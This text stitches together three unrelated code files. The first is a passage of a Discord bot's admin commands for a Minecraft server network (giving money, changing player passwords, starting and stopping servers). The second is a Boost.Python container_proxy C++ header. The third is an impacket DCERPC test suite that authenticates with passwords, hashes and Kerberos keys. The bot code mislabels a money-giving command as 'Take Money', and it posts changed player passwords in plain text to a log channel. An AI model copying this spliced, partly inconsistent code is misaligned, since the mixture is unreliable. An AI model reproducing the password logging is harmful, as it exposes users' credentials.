    if len(data[0]) < 3 or len(data[0]) > 16: await ctx.send("Invalid Username"); return
elif not data[1].isnumeric(): await ctx.send("Invalid Amount"); return
try:
p = await sendcmd(ctx, "survival", f"eco give {data[0]} {data[1]}")
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Take Money", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!", value=f"Successfully gave {data[1]} from {data[0]} \n \n**User** - `{data[0]}` \n **Amount** - `{data[1]}`",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} gave {data[1]} to {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} gave {data[1]} to {data[0]}')
# Change Server Power
@admin.command(aliases=['changepw', 'changepassword', 'pw', 'password'])
@commands.has_permissions(administrator=True)
async def changepw_admin(ctx, *data): # Change Password Command
    if len(data[0]) < 3 or len(data[0]) > 16:
await ctx.send("Invalid Username | Username must be between 3 and 16 characters")
return "invalid_username"
# Format = +admin changepw | username | password
    if len(data[1]) < 6 or len(data[1]) > 30:
await ctx.send("Invalid Password | Password must be between 6 and 30 characters")
return "invalid_password"
cmd = f"authme cp {data[0]} {data[1]}"
try:
p = await sendcmd(ctx, "auth", cmd)
except:
await ctx.reply("There was a error in sending the command")
return
if p != "done": return
embed = discord.Embed(title="Admin - Change Password", url="https://moonball.io", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name="Operation Successful!",value=f"Successfully Changed the Password. Issued by {ctx.author.name}#{ctx.author.discriminator} \n \n**Player** - `{data[0]}` \n **Password** - ||{data[1]}||",inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
await logger("a", f'{ctx.author.name}#{ctx.author.discriminator} changed the password of {data[0]}', "admin", f'{ctx.author.name}#{ctx.author.discriminator} changed the password of {data[0]}')
# Power Commands
@admin.command(aliases=['startserver', 'serverstart', 'ss', 'start'])
@commands.has_permissions(administrator=True)
async def start_admin(ctx, *data): # Start Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], "start", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!", color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!', value=f'Successfully Started the {data[0].capitalize()} Server!', inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['stopserver', 'serverstop', 'sts', 'stop'])
@commands.has_permissions(administrator=True)
async def stop_admin(ctx, *data): # Stop Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], "stop", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!",color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!', value=f'Successfully Stopped the {data[0].capitalize()} Server!',inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['restartserver', 'serverrestart', 'rs', 'restart'])
@commands.has_permissions(administrator=True)
async def restart_admin(ctx, *data): # Restart Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try: e = await serverpower(data[0], "restart", ctx)
except:
await ctx.reply(f"There was an error. Use `{prefix}admin css` to learn more")
return
if e == "exception": return
embed = discord.Embed(title="Server Power", url="https://moonball.io/",description=f"Starts/Stops/Restarts or Kills a specific server on command.\n `{prefix}admin css` to learn more!",color=embed_color)
embed.set_author(name=f"{embed_header}")
embed.add_field(name=f'Operation Successful!',value=f'Successfully Restarted the {data[0].capitalize()} Server!', inline=False)
embed.set_footer(text=f"{embed_footer}")
await ctx.reply(embed=embed)
await embed_log.send(embed=embed) # Sending it to the Logs channel
@admin.command(aliases=['killserver', 'serverkill', 'sk', 'kill'])
@commands.has_permissions(administrator=True)
async def kill_admin(ctx, *data): # Kill Server Command
data = " ".join(data).split() # Input Splitter
valid_names = ["proxy", "limbo", "auth", "lobby", "survival", "skyblock", "duels", "bedwars", "bot", "parkour"]
if data[0] not in valid_names:
await ctx.reply(f"Error : Invalid Server Name. Use `{prefix}admin css` to learn more!")
return
try:
e = await serverpower(data[0], | |
# Copyright 2004-2008 <NAME>.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
"""
This file contains indexing suite v2 code
"""
file_name = "indexing_suite/container_proxy.hpp"
code = r"""// Copyright (c) 2003 <NAME>
//
// Use, modification and distribution is subject to the Boost Software
// License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy
// at http://www.boost.org/LICENSE_1_0.txt)
//
// Header file container_proxy.hpp
//
// A container-wrapper that provides Python-style reference semantics
// for values stored in vector-like containers via element proxies.
//
// Class invariant:
// size() == m_proxies.size()
// for 0 <= i < size()
// m_proxies[i].get() != 0
// m_proxies[i]->owner() == this
// m_proxies[i]->index() == i
// m_proxies[i]->m_element_ptr.get() == 0
//
// History
// =======
// 2003/ 8/26 rmg File creation
// 2003/10/23 rmg Change pointer container from map to sequence
// 2008/12/08 Roman Change indexing suite layout
//
// $Id: container_proxy.hpp,v 1.1.2.28 2004/02/08 18:57:42 raoulgough Exp $
//
#ifndef BOOST_PYTHON_INDEXING_CONTAINER_PROXY_HPP
#define BOOST_PYTHON_INDEXING_CONTAINER_PROXY_HPP
#include <indexing_suite/proxy_iterator.hpp>
#include <indexing_suite/shared_proxy_impl.hpp>
#include <indexing_suite/element_proxy.hpp>
#include <indexing_suite/element_proxy_traits.hpp>
#include <indexing_suite/workaround.hpp>
#include <indexing_suite/methods.hpp>
#include <vector>
#include <cassert>
#include <boost/shared_ptr.hpp>
#include <boost/mpl/apply.hpp>
#include <boost/iterator/iterator_traits.hpp>
#include <indexing_suite/container_traits.hpp>
#include <indexing_suite/container_suite.hpp>
#include <indexing_suite/algorithms.hpp>
namespace boost { namespace python { namespace indexing {
template<typename T> struct identity {
typedef T held_type;
static T & get(T & obj) { return obj; }
static T const & get(T const & obj) { return obj; }
static T create () { return T(); }
    static T copy (T const &copy) { return copy; }
static void assign (T &to, T const &from) { to = from; }
static void pre_destruction (T &) { }
static void swap (T &one, T &two) { std::swap (one, two); }
};
template<typename P> struct deref {
typedef P held_type;
typedef typename boost::iterator_value<P>::type value;
static value & get (P & ptr) { return *ptr; }
static value const & get (P const & ptr) { return *ptr; }
static P create () { return P(); }
    static P copy (P const &copy) { return copy; }
static void assign (P &to, P const &from) { to = from; }
static void pre_destruction (P &) { }
static void swap (P &one, P &two) { std::swap (one, two); }
};
struct vector_generator {
// Generates vector type for any element type with default allocator
template<typename Element> struct apply {
typedef std::vector<Element> type;
};
};
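// For instance (illustrative only): instantiating the generator as
// mpl::apply1<vector_generator, pointer_impl>::type, as container_proxy
// does below, yields std::vector<pointer_impl> -- the container that
// holds the element proxies.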
#if BOOST_WORKAROUND (BOOST_MSVC, == 1200)
// Early template instantiation (ETI) workaround
namespace detail {
template<typename Container> struct msvc6_iterator {
typedef Container::iterator type;
};
template<> struct msvc6_iterator<int> {
typedef int *type;
};
}
#endif
template<class Container,
class Holder = identity<Container>,
class Generator = vector_generator>
class container_proxy
{
typedef container_proxy<Container, Holder, Generator> self_type;
typedef typename Container::iterator raw_iterator;
typedef ::boost::detail::iterator_traits<raw_iterator> raw_iterator_traits;
#if !defined (BOOST_NO_MEMBER_TEMPLATE_FRIENDS)
template<class C> friend class shared_proxy_impl;
template<class C, typename E, typename T, typename S, typename I>
friend class proxy_iterator;
#endif
public:
typedef typename Holder::held_type held_type;
typedef typename Container::size_type size_type;
typedef typename Container::difference_type difference_type;
typedef shared_proxy_impl<self_type> shared_proxy;
typedef typename Container::value_type raw_value_type;
typedef element_proxy<self_type> value_type;
typedef value_type reference; // Already has ref. semantics
typedef const_element_proxy<self_type> const_value_type;
typedef const_value_type const_reference; // Ref. semantics
typedef proxy_iterator <self_type, value_type, raw_iterator_traits,
size_type, raw_iterator> iterator;
typedef iterator const_iterator; // No const_iterator yet implemented
public:
// Constructors
template<typename Iter> container_proxy (Iter start, Iter finish)
// Define inline for MSVC6 compatibility
: m_held_obj (Holder::create()),
m_proxies ()
{
insert (begin(), start, finish);
}
container_proxy ();
explicit container_proxy (held_type const &h);
container_proxy (container_proxy const &);
container_proxy &operator= (container_proxy const &);
~container_proxy ();
Container const &raw_container() const; // OK to expose const reference
reference at (size_type index);
const_reference at (size_type index) const;
reference operator[] (size_type index) { return at(index); }
const_reference operator[] (size_type index) const { return at(index); }
size_type size () const { return raw_container().size(); }
size_type capacity () const { return raw_container().capacity(); }
void reserve (size_type s);
public:
iterator begin() { return iterator (this, static_cast<size_type>(0)); }
iterator end() { return iterator (this, raw_container().size()); }
iterator erase (iterator);
iterator erase (iterator, iterator);
iterator insert (iterator, raw_value_type const &);
template<typename Iter> void insert (iterator iter, Iter from, Iter to)
// Define here for MSVC6 compatibility
{
// Forward insertion to the right overloaded version
typedef typename BOOST_ITERATOR_CATEGORY<Iter>::type category;
insert (iter, from, to, category());
}
    void push_back (raw_value_type const &copy) { insert (end(), copy); }
value_type pop_back () {
value_type result = at (size() - 1);
erase (end() - 1);
return result;
}
public:
// These functions are useful only when client code has direct
// non-const acccess to the raw container (e.g. via an indirect
// holder supplied to our constructor). Any code that directly
// modifies the contents of the raw container (by replacing,
// inserting or erasing elements) must notify the container_proxy.
void detach_proxy (size_type index);
void detach_proxies (size_type from, size_type to);
// Call before overwriting element(s) in the raw container
void prepare_erase (size_type from, size_type to);
// Call before erasing elements directly from the raw container
void notify_insertion (size_type from, size_type to);
// Call after inserting elements directly into the raw container
public:
// Convenient replacement of elements (automatic proxy detachment)
void replace (size_type index, raw_value_type const &);
// template<typename Iter> void replace (size_type index, Iter, Iter);
void swap_elements (size_type index1, size_type index2);
bool is_valid () const; // Check the class invariant (for testing purposes)
private:
// Overloads for insertions with/without useful std::distance
template<typename Iter>
void insert (iterator iter, Iter from, Iter to, std::forward_iterator_tag)
// Define here for MSVC6 compatibility
{
assert (iter.ptr == this);
size_type count = std::distance (from, to);
// Add empty proxy pointers for the new value(s) (could throw)
m_proxies.insert (m_proxies.begin() + iter.index, count, pointer_impl());
try
{
// Insert the new element(s) into the real container (could throw)
raw_container().insert(
raw_container().begin() + iter.index,
from,
to);
try
{
// Create new proxies for the new elements (could throw)
write_proxies (iter.index, iter.index + count);
}
catch (...)
{
raw_container().erase(
raw_container().begin() + iter.index,
raw_container().begin() + iter.index + count);
throw;
}
}
catch (...)
{
m_proxies.erase(
m_proxies.begin() + iter.index,
m_proxies.begin() + iter.index + count);
throw;
}
// Adjust any proxies after the inserted elements (nothrow)
adjust_proxies(
m_proxies.begin() + iter.index + count,
m_proxies.end(),
static_cast<difference_type> (count));
}
template<typename Iter>
void insert (iterator iter, Iter from, Iter to, std::input_iterator_tag)
// Define here for MSVC6 compatibility
{
// insert overload for iterators where we *can't* get distance()
// so just insert elements one at a time
while (from != to)
{
iter = insert (iter, *from++) + 1;
}
}
private:
typedef boost::shared_ptr<shared_proxy> pointer_impl;
typedef typename mpl::apply1<Generator, pointer_impl>::type
pointer_container;
#if BOOST_WORKAROUND (BOOST_MSVC, == 1200)
typedef detail::msvc6_iterator<pointer_container>::type pointer_iterator;
#else
typedef typename pointer_container::iterator pointer_iterator;
#endif
#if defined (BOOST_NO_MEMBER_TEMPLATE_FRIENDS)
// Proxies need mutable access, and can't be friends with MSVC6
public:
#endif
Container &raw_container();
private:
void adjust_proxies (pointer_iterator, pointer_iterator, difference_type);
void write_proxies (size_type, size_type);
bool clear_proxy (pointer_impl &); // detach and do not reset
void clear_proxies (size_type, size_type); // detach and do not reset
void claim_all_proxies (); // Makes all proxies point at this object
private:
held_type m_held_obj;
pointer_container m_proxies;
};
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy ()
: m_held_obj (Holder::create()),
m_proxies ()
{
// Container is empty - no further processing
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy (held_type const &held)
: m_held_obj (Holder::copy (held)),
m_proxies (size())
{
write_proxies (0, size());
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::container_proxy (container_proxy const &copy)
: m_held_obj (Holder::copy (copy.m_held_obj)),
m_proxies (size())
{
write_proxies (0, size()); // Create our own proxies for the copied values
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator> &
container_proxy<Container, Holder, Generator>
::operator= (container_proxy const &copy)
{
container_proxy<Container, Holder, Generator> temp (copy);
// This could throw, but none of the remaining operations can
Holder::swap (m_held_obj, temp.m_held_obj);
std::swap (m_proxies, temp.m_proxies);
claim_all_proxies ();
temp.claim_all_proxies (); // Prepare for detach
return *this;
// temp destruction detaches any proxies that used to belong to us
}
template<class Container, class Holder, class Generator>
container_proxy<Container, Holder, Generator>
::~container_proxy ()
{
// Copy original values into any proxies being shared by external pointers
clear_proxies (0, size());
Holder::pre_destruction (m_held_obj);
}
template<class Container, class Holder, class Generator>
Container &
container_proxy<Container, Holder, Generator>
::raw_container ()
{
return Holder::get (m_held_obj);
| |
<gh_stars>100-1000
import unittest
import ConfigParser
from impacket.dcerpc.v5.ndr import NDRCALL
from impacket.dcerpc.v5 import transport, epm, samr
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, \
RPC_C_AUTHN_LEVEL_NONE, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_WINNT
from impacket.dcerpc.v5.dtypes import RPC_UNICODE_STRING
# aimed at testing just the DCERPC engine, not the particular
# endpoints (we should do specific tests for endpoints)
# here we're using EPM just because we need one, and it's the
# easiest one
class DCERPCTests(unittest.TestCase):
def connectDCE(self, username, password, domain, lm='', nt='', aesKey='', TGT=None, TGS=None, tfragment=0,
dceFragment=0,
auth_type=RPC_C_AUTHN_WINNT, auth_level=RPC_C_AUTHN_LEVEL_NONE, dceAuth=True, doKerberos=False,
bind=epm.MSRPC_UUID_PORTMAP):
rpctransport = transport.DCERPCTransportFactory(self.stringBinding)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(username, password, domain, lm, nt, aesKey, TGT, TGS)
rpctransport.set_kerberos(doKerberos)
rpctransport.set_max_fragment_size(tfragment)
dce = rpctransport.get_dce_rpc()
dce.set_max_fragment_size(dceFragment)
if dceAuth is True:
dce.set_credentials(*(rpctransport.get_credentials()))
dce.connect()
dce.set_auth_type(auth_type)
dce.set_auth_level(auth_level)
dce.bind(bind)
return dce
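    # Typical usage (grounded in the tests below; credentials come from
    # dcetests.cfg), e.g.:
    #   dce = self.connectDCE(self.username, self.password, self.domain,
    #                         auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
    #                         dceAuth=True, doKerberos=False)
    # after which requests are issued over the authenticated binding.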
def test_connection(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=False)
dce.disconnect()
def test_connectionHashes(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=False)
dce.disconnect()
def test_dceAuth(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthKerberos(self):
dce = self.connectDCE(self.username, self.password, self.domain, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasHashes(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasHashesKerberos(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasAes128Kerberos(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceAuthHasAes256Kerberos(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256, dceAuth=True, doKerberos=True)
resp = epm.hept_lookup(self.machine)
dce.disconnect()
def test_dceTransportFragmentation(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, tfragment=1, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentation(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_bigRequestMustFragment(self):
class dummyCall(NDRCALL):
opnum = 2
structure = (
('Name', RPC_UNICODE_STRING),
)
lmhash, nthash = self.hashes.split(':')
oldBinding = self.stringBinding
self.stringBinding = epm.hept_map(self.machine, samr.MSRPC_UUID_SAMR, protocol = 'ncacn_ip_tcp')
print self.stringBinding
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=0,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
dceAuth=True,
doKerberos=True, bind=samr.MSRPC_UUID_SAMR)
self.stringBinding = oldBinding
request = samr.SamrConnect()
request['ServerName'] = u'BETO\x00'
request['DesiredAccess'] = samr.DELETE | samr.READ_CONTROL | samr.WRITE_DAC | samr.WRITE_OWNER | samr.ACCESS_SYSTEM_SECURITY | samr.GENERIC_READ | samr.GENERIC_WRITE | samr.GENERIC_EXECUTE | samr.SAM_SERVER_CONNECT | samr.SAM_SERVER_SHUTDOWN | samr.SAM_SERVER_INITIALIZE | samr.SAM_SERVER_CREATE_DOMAIN | samr.SAM_SERVER_ENUMERATE_DOMAINS | samr.SAM_SERVER_LOOKUP_DOMAIN | samr.SAM_SERVER_READ | samr.SAM_SERVER_WRITE | samr.SAM_SERVER_EXECUTE
resp = dce.request(request)
request = samr.SamrEnumerateDomainsInSamServer()
request['ServerHandle'] = resp['ServerHandle']
request['EnumerationContext'] = 0
request['PreferedMaximumLength'] = 500
resp2 = dce.request(request)
try:
request = samr.SamrLookupDomainInSamServer()
request['ServerHandle'] = resp['ServerHandle']
request['Name'] = 'A'*4500
resp = dce.request(request)
except Exception, e:
if str(e).find('STATUS_NO_SUCH_DOMAIN') < 0:
raise
dce.disconnect()
def test_dceFragmentationWINNTPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationWINNTPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationKerberosPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_dceFragmentationKerberosPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, dceFragment=1,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_WINNTPacketIntegrity(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_HashesWINNTPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_HashesKerberosPacketIntegrity(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes128KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes256KerberosPacketIntegrity(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_packetAnonWINNTPacketIntegrity(self):
# With SMB Transport this will fail with STATUS_ACCESS_DENIED
try:
dce = self.connectDCE('', '', '', auth_level=RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,dceAuth=False, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
except Exception, e:
if not (str(e).find('STATUS_ACCESS_DENIED') >=0 and self.stringBinding.find('ncacn_np') >=0):
raise
def test_WINNTPacketPrivacy(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
dce.disconnect()
def test_KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, self.password, self.domain, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_HashesWINNTPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=False)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
dce.disconnect()
def test_HashesKerberosPacketPrivacy(self):
lmhash, nthash = self.hashes.split(':')
dce = self.connectDCE(self.username, '', self.domain, lmhash, nthash, auth_type=RPC_C_AUTHN_GSS_NEGOTIATE,
auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY, dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes128KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey128,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_Aes256KerberosPacketPrivacy(self):
dce = self.connectDCE(self.username, '', self.domain, '', '', self.aesKey256,
auth_type=RPC_C_AUTHN_GSS_NEGOTIATE, auth_level=RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
dceAuth=True, doKerberos=True)
request = epm.ept_lookup()
request['inquiry_type'] = epm.RPC_C_EP_ALL_ELTS
request['object'] = NULL
request['Ifid'] = NULL
request['vers_option'] = epm.RPC_C_VERS_ALL
request['max_ents'] = 499
resp = dce.request(request)
resp = dce.request(request)
resp.dump()
dce.disconnect()
def test_AnonWINNTPacketPrivacy(self):
# With SMB Transport this will fail with STATUS_ACCESS_DENIED
try:
